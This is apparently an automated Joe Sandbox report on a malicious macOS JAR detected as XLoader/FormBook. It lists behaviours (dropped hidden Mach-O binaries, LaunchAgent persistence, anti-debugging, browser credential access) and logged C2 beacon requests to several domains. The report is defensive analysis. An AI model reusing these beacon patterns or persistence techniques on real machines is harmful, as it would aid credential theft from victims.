macOS Analysis Report Statement SKBMT 09818.jar

Overview

General Information

Sample Name:Statement SKBMT 09818.jar
Analysis ID:1032
MD5:4ded6a1d590e8a31ae6b9ea0ffb3331d
SHA1:b8c0167341d3639eb1ed2636a56c272dc66546fa
SHA256:81c4276f2e3c0ed456b08402a6a5b63d0cad68220b7a3275b3cbf0ba73faaa21
Detection

XLoader
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Found XLoader JAR binder / loader
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected XLoader
Accesses directories and/or files with sensitive browser data likely for credential stealing
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Executes hidden files
Java spawns dropped Mach-O files
Writes Mach-O files to hidden directories
Changes permissions of written Mach-O files
Creates application bundles
Creates hidden files, links and/or directories
Creates memory-persistent launch services
Creates user-wide 'launchd' managed services aka launch agents
Executes commands using a shell command-line interpreter
HTTP GET or POST without a user agent
Mach-O contains sections with high entropy indicating compressed/encrypted content
Reads hardware related sysctl values
Reads launchservices plist files
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads the systems OS release and/or type
Reads the systems hostname
Writes 64-bit Mach-O files to disk

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior.

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:1032
Start date:22.07.2021
Start time:14:09:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 6s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Statement SKBMT 09818.jar
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Analysis Mode:default
Detection:MAL
Classification:mal92.troj.spyw.evad.macJAR@0/9@24/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 17.253.109.201, 17.253.113.202, 17.253.113.201, 17.253.54.253, 17.253.54.125, 17.253.108.253, 17.253.108.125, 17.253.54.251
  • Excluded domains from analysis (whitelisted): ocsp.apple.com, valid.origin-apple.com.akadns.net, time-macos.apple.com, time-osx.g.aaplimg.com, ocsp-a.g.aaplimg.com, valid-apple.g.aaplimg.com, crl.apple.com, valid.apple.com, ocsp-lb.apple.com.akadns.net, lb._dns-sd._udp.0.11.168.192.in-addr.arpa
  • VT rate limit hit for: zincfacemask.com

Process Tree

  • System is macvm-highsierra
  • Jar Launcher (MD5: fbf3f7600341147960760ba67d456816) Arguments: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher
    • java (MD5: f1ccfcbe272f38c2cdafba7a7ddfc5dc) Arguments: /usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar
    • java (MD5: 1f2f4e0dc30c84d99d4d852fd4400c92) Arguments: /usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar
      • kIbwf02l (MD5: a17bf4533d7ec677a0d4bdae19e41ff2) Arguments: /Users/berri/kIbwf02l
        • sh New Fork (PID: 557, Parent: 556)
        • NBNlRBXH (MD5: a17bf4533d7ec677a0d4bdae19e41ff2) Arguments: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
  • Preview (MD5: 14cc1485ead8fac8c80d49d481383f69) Arguments: /Applications/Preview.app/Contents/MacOS/Preview
  • cleanup

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
/Users/berri/kIbwf02l | JoeSecurity_XLoader | Yara detected XLoader | Joe Security |
/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH | JoeSecurity_XLoader | Yara detected XLoader | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp | JoeSecurity_XLoader | Yara detected XLoader | Joe Security |
00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp | JoeSecurity_XLoader | Yara detected XLoader | Joe Security |

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: Statement SKBMT 09818.jar | Virustotal: Detection: 35%
Yara detected XLoader
Source: Yara match | File source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: /Users/berri/kIbwf02l, type: DROPPED
Source: Yara match | File source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
Source: global traffic | HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.zincfacemask.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1 Host: www.drlindaydevenish.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.exploringelleblog.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.hypesoleco.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1 Host: www.electricbrandsusa.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.decoratudo.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1 Host: www.rshuahui.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.lidokeyhomes.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1 Host: www.iregentos.info Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1 Host: www.dutythrow.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Source: unknown | TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown | TCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: www.ssmjoin.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 12:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 CF-Cache-Status: MISS Server: cloudflare CF-RAY: 672c920cacb70211-ZRH
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp | String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp | String found in binary or memory: http://crl.apple.com/root.crl0
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp | String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: java, 00000555.00000246.9.00000001025ab000.00000001025c8000.r-x.sdmp | String found in binary or memory: http://java.oracle.com/
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp | String found in binary or memory: http://ocsp.apple.com/ocsp04-devid010
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca0
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp | String found in binary or memory: http://www.apple.com/certificateauthority0
Source: java, 00000555.00000246.9.00000001230e8000.00000001232a1000.r--.sdmp | String found in binary or memory: http://www.apple.com/http://www.apple.com/Copyright
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp | String found in binary or memory: https://www.apple.com/appleca/0
Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180

E-Banking Fraud:

Yara detected XLoader
Source: Yara match | File source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: /Users/berri/kIbwf02l, type: DROPPED
Source: Yara match | File source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

System Summary:

Found XLoader JAR binder / loader
Source: oBSrz/OBSrz.java | Java decompilation: Binder APIs
Source: classification engine | Classification label: mal92.troj.spyw.evad.macJAR@0/9@24/0

Data Obfuscation:

Java spawns dropped Mach-O files
Source: PID: 556 | Dropped Mach-O executed via jspawnhelper: /Users/berri/kIbwf02l

Persistence and Installation Behavior:

Executes hidden files
Source: /bin/sh (PID: 557) | File in hidden directory executed: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
Writes Mach-O files to hidden directories
Source: /Users/berri/kIbwf02l (PID: 556) | 64-bit Mach-O written to hidden directory: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555) | Permissions modified for written 64-bit Mach-O /Users/berri/kIbwf02l: bits: - usr: - grp: - all: rwx
Source: /Users/berri/kIbwf02l (PID: 556) | Bundle Info.plist File created: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plist
Source: /Users/berri/kIbwf02l (PID: 556) | Hidden Directory created: /Users/berri/.gLUpQD8hXDj8 -> /Users/berri/.gLUpQD8hXDj8
Source: /Users/berri/kIbwf02l (PID: 556) | Shell command executed: sh -c /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555) | File written: /Users/berri/kIbwf02l
Source: /Users/berri/kIbwf02l (PID: 556) | File written: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558) | Random device file read: /dev/random
Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 554) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java (PID: 555) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Applications/Preview.app/Contents/MacOS/Preview (PID: 558) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher (PID: 555) | Java binary: /usr/bin/java
Source: /usr/bin/java (PID: 555) | Java binary: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java
Source: /Users/berri/kIbwf02l (PID: 556) | XML plist file created: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plist
Source: /Users/berri/kIbwf02l (PID: 556) | XML plist file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist
Source: /Users/berri/kIbwf02l (PID: 556) | Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist
Source: /Users/berri/kIbwf02l (PID: 556) | Launch agent created; file created: /Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist

Hooking and other Techniques for Hiding and Protection:

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Source: /Users/berri/kIbwf02l (PID: 556) | PTRACE system call (PT_DENY_ATTACH): PID 556 denies future traces
Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH (PID: 557) | PTRACE system call (PT_DENY_ATTACH): PID 557 denies future traces
Source: kIbwf02l.246.dr | Dropped file: section __text with 7.1309 entropy (max. 8.0)
Source: NBNlRBXH.248.dr | Dropped file: section __text with 7.1309 entropy (max. 8.0)
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN8JVMCIEnv18get_klass_by_indexERK18constantPoolHandleiRbP5Klass
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: Unable to link/verify VirtualMachineError class
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompilerToVM.cpp
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext15set_allContextsEP15objArrayOopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: JVMCIRuntime::new_array
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: (JVMCI)
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: JVMCINMethodSizeLimit
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN5ciEnv36_HotSpotJVMCIMetaAccessContext_klassE
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: _aot_jvmci_runtime_test_deoptimize_call_int
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN12JVMCIRuntime18identity_hash_codeEP10JavaThreadP7oopDesc
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/jvmci/jvmciCompiler.hpp
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: _aot_jvmci_runtime_dynamic_new_array
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: _aot_jvmci_runtime_new_array
Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmp | Binary or memory string: 7sun.property.sun.boot.library.path/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib(
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: INCLUDE_JVMCI
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: _jvmciHotSpotVMIntConstants
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN13JVMCICompiler14compile_methodEP5ciEnvP8ciMethodiP12DirectiveSet
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN12JVMCIRuntime30initialize_HotSpotJVMCIRuntimeEP6Thread
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: JVMCIRuntime::validate_object
Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmp | Binary or memory string: JVMCIRuntime::throw_klass_external_name_exception
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: __ZN29HotSpotJVMCIMetaAccessContext17set_metadataRootsEP8_jobjectP15objArrayOopDesc
Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmp | Binary or memory string: _jvmciHotSpotVMStructs
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime16initialize_JVMCIEP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: jdk/vm/ci/runtime/JVMCI
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime11monitorexitEP10JavaThreadP7oopDescP9BasicLock
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_exception_handler_for_pc
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::log_object
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler9_instanceE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _JVMCICounterSize
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __Z24set_jvmci_specific_flagsv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN16JVMCIKlassHandleC2EP6ThreadP5Klass
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIEnv::dependencies_invalid
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN22HotSpotCompiledNmethod8jvmciEnvEP8_jobject
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::dynamic_new_instance
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_validate_object
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN14JVMCIVMStructs19localHotSpotVMTypesE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: __ CodeHeapStateAnalytics: Function %s is not supported__ CodeHeapStateAnalytics lock wait took %10.3f seconds ___________ CodeCache lock wait took %10.3f seconds ___________ CodeCache lock hold took %10.3f seconds ___________ CodeHeapStateAnalytics total duration %10.3f seconds _________Compilation events%4d COMPILE PROFILING SKIPPED: %snmethod %d%s 0x%016lx code [0x%016lx, 0x%016lx]retry at different tier%4d COMPILE SKIPPED: %sklass id='%d' unloaded='1' flags='%d'method id='%d' holder='%d' return='%d' arguments='' bytes='%d' iicount='%d'type id='%d' name='%s'unknown id='%d'/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/compiler/compileLog.cppsymbol id='%d' name='<compilation_log thread='%lu'><fragment><![CDATA[]]><![CDATA[]]></fragment></compilation_log>inline_success reason='inline_fail reason='</>code_cache/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/compiler/compileTask.cppguarantee(_code_handle != NULL) failed%c%c%c%c%c - (method) @ %d (native) compile_id='%d' compile_kind='osr' osr_bci='%d' level='%d' blocking='1'task_queued comment='%s' hot_count='%d'taskunknownfailure reason='%s'task_done success='%d' nmsize='%d' count='%d' backedge_count='%d' inlined_bytes='%d' %c%c%c @ %d (not 
loaded)CompileTaskLockno_reasonbackedge_counttieredCTWreplaywhiteboxmust_be_compiled/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/code/compiledIC.cpp - metadata: - klass: /scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/share/oops/compiledICHolder.cppguarantee(holder_metadata()->is_method() || holder_metadata()->is_klass()) failedshould be method or klassguarantee(holder_klass()->is_klass()) failedshould be klass{compiledICHolder}/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/open/src/hotspot/cpu/x86/compiledIC_aot_x86_64.cppguarantee(stub != NULL) failedstub not foundCompiledPltStaticCall/scratch/mesos/slaves/07fc96ef-bf4d-487f-b22f-a84e49f5f44a-S27799/frameworks/1735e8a2-a1db-478c-8104-60c8b0af87dd-0196/executors/23259148-f5c6-492a-83be-44c13ecc6561/runs/a079e66e-7a74-497b-8aee-a8f77a442865/workspace/o
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv15register_methodERK12methodHandleRP7nmethodiP11CodeOffsetsiP10CodeBufferiP9OopMapSetP21ExceptionHandlerTableP16AbstractCompilerP24DebugInformationRecorderP12DependenciesPS_ibb6HandleSL_SL_
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIHostThreads
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN10JavaThread26_jvmci_old_thread_countersE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::none
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCITrace-1:
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime8shutdownEP6Thread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler9bootstrapEP6Thread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime24load_and_clear_exceptionEP10JavaThread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN7nmethod26clear_jvmci_installed_codeEv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime24test_deoptimize_call_intEP10JavaThreadi
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime10log_printfEP10JavaThreadPKclll
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::new_instance
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN22HotSpotCompiledNmethod16_jvmciEnv_offsetE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: guarantee(!_HotSpotJVMCIRuntime_initialized) failed
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN14JVMCIVMStructs21localHotSpotVMStructsE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime13log_primitiveEP10JavaThreadtlh
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime23adjust_comp_level_innerERK12methodHandleb9CompLevelP10JavaThread
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN19HotSpotJVMCIRuntime26compilationLevelAdjustmentE6Handle
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _jvmciHotSpotVMAddresses
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIUseFastLocking
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime23get_HotSpotJVMCIRuntimeEP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: cannot reinitialize HotSpotJVMCIRuntime
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __GLOBAL__sub_I_jvmciCodeInstaller.cpp
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: EagerJVMCI
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIGlobals24check_jvmci_supported_gcEv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv23get_field_by_index_implEP13InstanceKlassR15fieldDescriptori
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN19HotSpotJVMCIRuntime34_compilationLevelAdjustment_offsetE
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::write_barrier_pre
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13CodeInstaller13map_jvmci_bciEi
